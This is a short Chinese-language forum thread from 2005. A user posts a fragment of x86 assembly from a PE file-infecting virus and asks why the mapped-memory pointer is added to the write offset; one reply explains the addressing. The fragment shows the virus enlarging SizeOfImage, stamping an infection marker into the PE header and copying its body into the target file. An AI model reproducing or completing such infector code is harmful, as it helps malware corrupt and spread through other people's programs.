请教高手

楼主^#

更多发布于：2005-05-07 17:41

mul ecx

xchg eax,ebx ;还原 eax->pe_Header

mov [eax+50h],ebx

;保更新后的Image_Size大小=（原Image_size+病毒长度）对齐后的长度

;$

mov dword ptr [eax+8],\'dark\' ;病毒感染标志直接写到被感染文件的PE头中

cld

mov ecx,VirusLen

mov edi,[ebp+oldEnd]

add edi,[ebp+pMem]　　　；pMem是指向映射到内存的第一个字节的指针

？？？不懂就是这为什么到了文件尾后还要加这个内存映射呢，请高手告诉我

lea esi,[ebp+vBegin]

rep movsb ;将病毒代码写入目标文件新建的节中!

喜欢0

刚则折，柔恒存，柔羽胜刚强！万法自然，无根无极！－－太极

zhaock 驱动太牛注册日期2002-01-26 最后登录2018-06-02 粉丝3 关注2 积分73328分威望362317点贡献值1点好评度226点原创分0分专家分0分加关注写私信	沙发^# 发布于：2005-05-12 11:52 edi是RVA吧,也就是相对于基地址base的相对地址,所以要加上base 太冷清了,凑凑热闹,增加点人气
	回复(0) 喜欢(0)

moonYut

驱动小牛

注册日期2004-03-09
最后登录2006-12-21
粉丝0
关注0
积分1000分
威望138点
贡献值17点
好评度117点
原创分0分
专家分0分

加关注写私信

板凳^#

发布于：2005-05-12 12:06

谢谢

刚则折，柔恒存，柔羽胜刚强！万法自然，无根无极！－－太极

回复喜欢

发帖回复

« 返回列表

您需要登录后才可以回帖，登录或者注册

返回顶部

请教高手

最新喜欢：